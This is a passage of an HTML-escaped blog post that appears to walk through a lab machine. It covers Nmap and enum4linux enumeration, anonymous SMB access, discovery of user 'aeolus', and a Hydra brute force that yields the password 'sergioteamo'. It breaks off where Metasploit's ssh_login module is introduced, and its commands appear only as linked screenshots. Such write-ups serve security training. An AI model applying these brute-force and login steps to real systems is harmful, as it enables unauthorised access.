arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;2 - ENUMERATION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgI59RxyOUR7sX_V5pf-5UBaoSY9_WipcbE5dQ9NbP-eUobC6jRLJ_c0KAnO__xRXUCiT5WJN5bCMuMLpVspMHQQIjTDWQlc8e5Gjh93qh3PN712phi1WYLzZNjgvFHxHlalET-vUD_OU_IgISE5YFdjzH2pUlQp439JKGM44nBRyYd2GIIQoJW5T2Cjw=s435&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;250&quot; data-original-width=&quot;435&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgI59RxyOUR7sX_V5pf-5UBaoSY9_WipcbE5dQ9NbP-eUobC6jRLJ_c0KAnO__xRXUCiT5WJN5bCMuMLpVspMHQQIjTDWQlc8e5Gjh93qh3PN712phi1WYLzZNjgvFHxHlalET-vUD_OU_IgISE5YFdjzH2pUlQp439JKGM44nBRyYd2GIIQoJW5T2Cjw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Connecting to the web server:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg2iT3aEk_07rHGXbm9p9BFsepFylDAAlrWemrCMBh4qr2DIat6Te2Z3tVPID1sjTafRRxRqvHY6xIf8G6-LRis-Ez5hq9eqI_E1Jlc7qu84GskdfltogxuhpQNmmd13ZUTnjY9YbTIwNsm0oWW0ilP6BmNziZq7rzIG8efOSTYKoZI8Q2A535mA1H07w=s824&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;824&quot; data-original-width=&quot;759&quot; height=&quot;589&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg2iT3aEk_07rHGXbm9p9BFsepFylDAAlrWemrCMBh4qr2DIat6Te2Z3tVPID1sjTafRRxRqvHY6xIf8G6-LRis-Ez5hq9eqI_E1Jlc7qu84GskdfltogxuhpQNmmd13ZUTnjY9YbTIwNsm0oWW0ilP6BmNziZq7rzIG8efOSTYKoZI8Q2A535mA1H07w=w542-h589&quot; width=&quot;542&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with &lt;b&gt;enum4linux&lt;/b&gt; we discover a shared folder named&lt;b&gt;&amp;nbsp;anonymous&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiNDbxOYcRiY5y_lnYM9wrkcsoZG2JGxr4EayqafZvFWkOLkvXoHMAjS93EcgU3txx0i3-3Yh0-Lz1JE42NWTSLM2rYhgs-d0w5BvYUsEXomzP6q5JnNvursi3ccyKrAZOCvtLJNsLPiSp8v4R90GmJ8ikJEW17Aw5iBKbuUvPj3Wyf7H-fj-Ng_0z6cg=s447&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;22&quot; data-original-width=&quot;447&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiNDbxOYcRiY5y_lnYM9wrkcsoZG2JGxr4EayqafZvFWkOLkvXoHMAjS93EcgU3txx0i3-3Yh0-Lz1JE42NWTSLM2rYhgs-d0w5BvYUsEXomzP6q5JnNvursi3ccyKrAZOCvtLJNsLPiSp8v4R90GmJ8ikJEW17Aw5iBKbuUvPj3Wyf7H-fj-Ng_0z6cg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg3JzJJKhj06JMZhlVMvEWHdP561QEX7nsYET7ZUNPOR3HOW7D0HP8GkYjs16ar5R2brKjC34Qe0meSYNLse5NLJuYmVz4Qb8cWlU_ylZIuePeml-F8kR-pw_RE7XKRtO-2VHxGwfXleeMKH0QCYF92U3NYa4sAo_rYpJLx8okyLOB5OCxoCz9qx2M_KQ=s755&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;548&quot; data-original-width=&quot;755&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg3JzJJKhj06JMZhlVMvEWHdP561QEX7nsYET7ZUNPOR3HOW7D0HP8GkYjs16ar5R2brKjC34Qe0meSYNLse5NLJuYmVz4Qb8cWlU_ylZIuePeml-F8kR-pw_RE7XKRtO-2VHxGwfXleeMKH0QCYF92U3NYa4sAo_rYpJLx8okyLOB5OCxoCz9qx2M_KQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Connecting with credentials &lt;b&gt;anonymous:anonymous&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEilaxbiVnqmj-HXN7lF58kJ8iXRD6sPHvYaBTKJbfiErYNps86kT07N6HtV08_v9NCkQng8bCmgyurxp4l0GPIuCWjw8hDvTF0iULR3K5tE0MPuvq_0hakG_PyX6r6QHizahNmCdizHucmcPTTIG1M67wPThGVC-fmzUR1IsUiIU9TOrAjA9LfzI1ibrg=s745&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;368&quot; data-original-width=&quot;745&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEilaxbiVnqmj-HXN7lF58kJ8iXRD6sPHvYaBTKJbfiErYNps86kT07N6HtV08_v9NCkQng8bCmgyurxp4l0GPIuCWjw8hDvTF0iULR3K5tE0MPuvq_0hakG_PyX6r6QHizahNmCdizHucmcPTTIG1M67wPThGVC-fmzUR1IsUiIU9TOrAjA9LfzI1ibrg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgeSmtACTgil1P_tPl5uppwzd4DUb_I0KgQOcmZUCkDquLjmODSCj4Pqf8qvirAqRbdP8rs1DqtyxXfRYLV4P54c1-tn_tLpBsl3SMup2f2jetKUKgchl1uKahlWDIUu977K5w-mGOkeziAyA2ok4OVLehrEFA_8z-pKpDON9bJA1n5_nTiePWPvX4BEA=s565&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;97&quot; data-original-width=&quot;565&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgeSmtACTgil1P_tPl5uppwzd4DUb_I0KgQOcmZUCkDquLjmODSCj4Pqf8qvirAqRbdP8rs1DqtyxXfRYLV4P54c1-tn_tLpBsl3SMup2f2jetKUKgchl1uKahlWDIUu977K5w-mGOkeziAyA2ok4OVLehrEFA_8z-pKpDON9bJA1n5_nTiePWPvX4BEA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Changing to folder &lt;b&gt;backups&lt;/b&gt; and getting &lt;b&gt;log.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg0q8x07rFf-zC1avkYKaufA9PwuMelRwTE6TnnFhuRao65kVXxoq6YhkYgLvvoMRa55dXqH6EG6EXJnkqK7gsqZS4F2mOrvUSLOwLU4UMFl0wpxHTN1DTRDepSANHc2qOsuH15MgZAifg8MM80CXGPxZ9M42wjCuDcz1yYvqIw6yLXL-P-eSjuAFOxYA=s832&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;138&quot; data-original-width=&quot;832&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg0q8x07rFf-zC1avkYKaufA9PwuMelRwTE6TnnFhuRao65kVXxoq6YhkYgLvvoMRa55dXqH6EG6EXJnkqK7gsqZS4F2mOrvUSLOwLU4UMFl0wpxHTN1DTRDepSANHc2qOsuH15MgZAifg8MM80CXGPxZ9M42wjCuDcz1yYvqIw6yLXL-P-eSjuAFOxYA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjQCzJvDkOjFSD2aeqUeLXUbeNbQagkU21FHghIScJ5A4NdiG5YG_A3aD6QhG_Gj0YGtduPhEQapB2VekzDOUkWDd0zS7sXITZFeWbuR-JwDrwdpikaxx3QT0O1vOb2aHMztg_Ct5u8Lr7Lr7Jn_8jHg2Vz1Y8RX_Arpiwbf_DSx7zfXAwAMaIconK15A=s820&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;164&quot; data-original-width=&quot;820&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjQCzJvDkOjFSD2aeqUeLXUbeNbQagkU21FHghIScJ5A4NdiG5YG_A3aD6QhG_Gj0YGtduPhEQapB2VekzDOUkWDd0zS7sXITZFeWbuR-JwDrwdpikaxx3QT0O1vOb2aHMztg_Ct5u8Lr7Lr7Jn_8jHg2Vz1Y8RX_Arpiwbf_DSx7zfXAwAMaIconK15A=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjDW-GXLnLy_CAzMPrC24xmA2bEWwjyVGqYbAnjGkbHrmWqr2m-iFRFMh_hQt6T28zp0RRgw8jbAot0vwHHoPYqIzcee2gA_4o_JtMto41aCrtATCUmGYLa_eRfqKLtZ3VwkrzKtK5mKOH0jij4DotP5JJFbVoAUFwZrlcAr093P3oYdGGIpiHGXM9nTA=s597&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;45&quot; data-original-width=&quot;597&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjDW-GXLnLy_CAzMPrC24xmA2bEWwjyVGqYbAnjGkbHrmWqr2m-iFRFMh_hQt6T28zp0RRgw8jbAot0vwHHoPYqIzcee2gA_4o_JtMto41aCrtATCUmGYLa_eRfqKLtZ3VwkrzKtK5mKOH0jij4DotP5JJFbVoAUFwZrlcAr093P3oYdGGIpiHGXM9nTA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;log.txt&lt;/b&gt; reveals the existence of user &lt;b&gt;aeolus&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhbnPbqsC9WdB92Lod0VVEHo5KGvbtiweLb9No0WJr32Tr5lEolAD7IfubCA30ercmnmmZ7zQQFBhICHpAFU5cxXCJGJGIvNcISnA_jnhg3K7JUPb956U2oEQGmlGIYs0FMVW7Y6EnDw9YQInNJpeYdqlZ5TKhWf7uKI96cxuTT-Gu3BG9OvmH9uGgjIA=s780&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;544&quot; data-original-width=&quot;780&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhbnPbqsC9WdB92Lod0VVEHo5KGvbtiweLb9No0WJr32Tr5lEolAD7IfubCA30ercmnmmZ7zQQFBhICHpAFU5cxXCJGJGIvNcISnA_jnhg3K7JUPb956U2oEQGmlGIYs0FMVW7Y6EnDw9YQInNJpeYdqlZ5TKhWf7uKI96cxuTT-Gu3BG9OvmH9uGgjIA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhnjUINSgy416msRi9ROcEjNLrPCiR5XTrFkO_sD_LZKi5APzSUBO1RVdnsky7HYHrIV_HelnSg8VGLw8Cx0wLOetsdOpWUFBQtDuN2bvuEBpsqfeTmkGOBMIuGZkZ8I6-O5Dx3QxN0PbuJFbhfBtZ99g5jS8-RNVpFiFgFDSNHy6ebdPduT1USqKvnkg=s319&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;126&quot; data-original-width=&quot;319&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhnjUINSgy416msRi9ROcEjNLrPCiR5XTrFkO_sD_LZKi5APzSUBO1RVdnsky7HYHrIV_HelnSg8VGLw8Cx0wLOetsdOpWUFBQtDuN2bvuEBpsqfeTmkGOBMIuGZkZ8I6-O5Dx3QxN0PbuJFbhfBtZ99g5jS8-RNVpFiFgFDSNHy6ebdPduT1USqKvnkg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhDzFX6KTnMx8BCvNgNni_h03JpEtOWrEGxqBl4rk1hm6tpDU-fx9LlgFd3c7jVWM9TyP2U7WIgzvcOh9sz93JKkmpqxvKugoq_hv-zUIfK_zh5CkPdZdtB3GuftyokQLcODP89S0mTyMbTsS34ttFmvvo5Qq3ZUTbxxfQCr5xk2B_f97Y2qfXc_nhPnw=s658&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;80&quot; data-original-width=&quot;658&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhDzFX6KTnMx8BCvNgNni_h03JpEtOWrEGxqBl4rk1hm6tpDU-fx9LlgFd3c7jVWM9TyP2U7WIgzvcOh9sz93JKkmpqxvKugoq_hv-zUIfK_zh5CkPdZdtB3GuftyokQLcODP89S0mTyMbTsS34ttFmvvo5Qq3ZUTbxxfQCr5xk2B_f97Y2qfXc_nhPnw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;Hydra&lt;/b&gt; and &lt;b&gt;rockyou.txt&lt;/b&gt; discover password &lt;b&gt;sergioteamo&lt;/b&gt; for user &lt;b&gt;aeolus&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi6UopU_pNCtYlr2HFiJ5BgEDq-WH5Aar1a8W46TDR7a0ZvVnA5Wa3njOc1vBpjd2GHlNnNaWDzXVWaHE0u-RVWoiFsvEDB1zxAS9XZKLkjw9rBE-x1OQqNt1h-fqQXBEl5DFgRHtwWkqU1Dm04Lq4piIzTb7x86bkaWRERiMQjs-X-ciWVeYKg0eAOsQ=s767&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;206&quot; data-original-width=&quot;767&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi6UopU_pNCtYlr2HFiJ5BgEDq-WH5Aar1a8W46TDR7a0ZvVnA5Wa3njOc1vBpjd2GHlNnNaWDzXVWaHE0u-RVWoiFsvEDB1zxAS9XZKLkjw9rBE-x1OQqNt1h-fqQXBEl5DFgRHtwWkqU1Dm04Lq4piIzTb7x86bkaWRERiMQjs-X-ciWVeYKg0eAOsQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- However direct SSH access is denied:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiSO7GbIdtmdnEksJ5WkH2bgRgL-yDhJJB1WSBJsKIWbxAOFrp5XPXI3u-SU4MF_cPQqze2I7zlKvVmBKJ4LHTU3XAQsZxFfWMD7XovDP-O6qBLEVV9-XWIToZO6o8dll81tKIBnJ8uO5AY6J9gDxJddUdrl3oWNkyYQ7eKToQcs48agu1V6d5ltxGVhQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;163&quot; data-original-width=&quot;670&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiSO7GbIdtmdnEksJ5WkH2bgRgL-yDhJJB1WSBJsKIWbxAOFrp5XPXI3u-SU4MF_cPQqze2I7zlKvVmBKJ4LHTU3XAQsZxFfWMD7XovDP-O6qBLEVV9-XWIToZO6o8dll81tKIBnJ8uO5AY6J9gDxJddUdrl3oWNkyYQ7eKToQcs48agu1V6d5ltxGVhQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Metasploit with module&amp;nbsp;&lt;b&gt;ssh_login&lt;/b&gt; yields better result:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a 